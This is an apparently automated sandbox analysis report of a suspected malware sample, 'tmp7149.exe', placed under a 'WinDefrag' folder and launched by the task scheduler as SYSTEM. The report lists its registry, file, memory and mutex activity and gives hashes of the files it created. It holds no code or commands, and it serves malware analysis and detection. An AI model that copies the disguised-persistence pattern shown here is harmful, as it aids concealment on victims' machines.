| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
Thread 0xa94
43
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Unmap | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
|
1 |
Thread 0x7e4
135
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
19 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 62 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 17 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 57 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 25 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 54 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 |
Process #37: tmp7149.exe
1984
0
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe |
| Command Line | C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:03, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x534 |
| Parent PID | 0xa58 (c:\windows\system32\taskeng.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
67C
0x
9C4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00293fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Private Memory | rwx |
|
|
|
- |
| imm32.dll | 0x002b0000 | 0x002cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00360000 | 0x003c6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Private Memory | rwx |
|
|
|
- |
| tmp7149.exe | 0x00400000 | 0x00487fff | Memory Mapped File | rwx |
|
|
|
|
| rsaenh.dll | 0x00490000 | 0x004cbfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006d4fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x006f0000 | 0x009befff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x00b47fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b50000 | 0x00b50000 | 0x00cd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000da0000 | 0x00da0000 | 0x00f9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fa0000 | 0x00fa0000 | 0x01392fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000013a0000 | 0x013a0000 | 0x013dffff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000013e0000 | 0x013e0000 | 0x013e0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000013f0000 | 0x013f0000 | 0x013f0fff | Private Memory | rwx |
|
|
|
- |
| kernelbase.dll | 0x01400000 | 0x0146afff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000001470000 | 0x01470000 | 0x01498fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001470000 | 0x01470000 | 0x01478fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001470000 | 0x01470000 | 0x01470fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001470000 | 0x01470000 | 0x01472fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000010000000 | 0x10000000 | 0x10006fff | Private Memory | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75560000 | 0x75576fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x75580000 | 0x755a8fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x755b0000 | 0x755bafff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x755c0000 | 0x755fafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75600000 | 0x75615fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x75950000 | 0x7595cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_500c0908-381e-49dc-a6a0-1a800e9a56e0 | 1.04 KB |
MD5:
d2f945b97736bfd11ae34023c77bedfd
SHA1: 051c0f1220ca16b9880a3c94da80876807787fcb SHA256: 7d6e41456f3ecafc2546fd86a25b759b1bcddda9bf3b20197ec6c5955b99f1da SSDeep: 24:LLKf5b6UWqapsa9IqOQ5Ua5XDb8E7w/IQAUWnPtoEX:Yb6UdNcXODwbz7LQAUgVN |
|
|
| c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_500c0908-381e-49dc-a6a0-1a800e9a56e0 | 0.05 KB |
MD5:
64bc6b0e1d907ae8acf27bdb155344c2
SHA1: 7aa0d9af2d61d73a044f288e16fdd07813c972ba SHA256: dd4e0b0b64da5d95420c0e5423726f109e820e18b8a0b602274a7404f16f3ab2 SSDeep: 3:/lSll+:Ak |
|
|
Threads
Thread 0x67c
1764
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:29:28 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 277057 |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-use_fc_key |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-use_fc_key |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-sjlj_once |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-sjlj_once |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-once_global_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-once_global_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-once_obj_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-once_obj_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mutex_global_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mutex_global_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_tls_once_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_tls_once_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_tls_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_tls_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mtx_pthr_locked_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mtx_pthr_locked_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mutex_global_static_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mutex_global_static_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mxattr_recursive_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mxattr_recursive_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-pthr_root_shmem |
|
1 | |
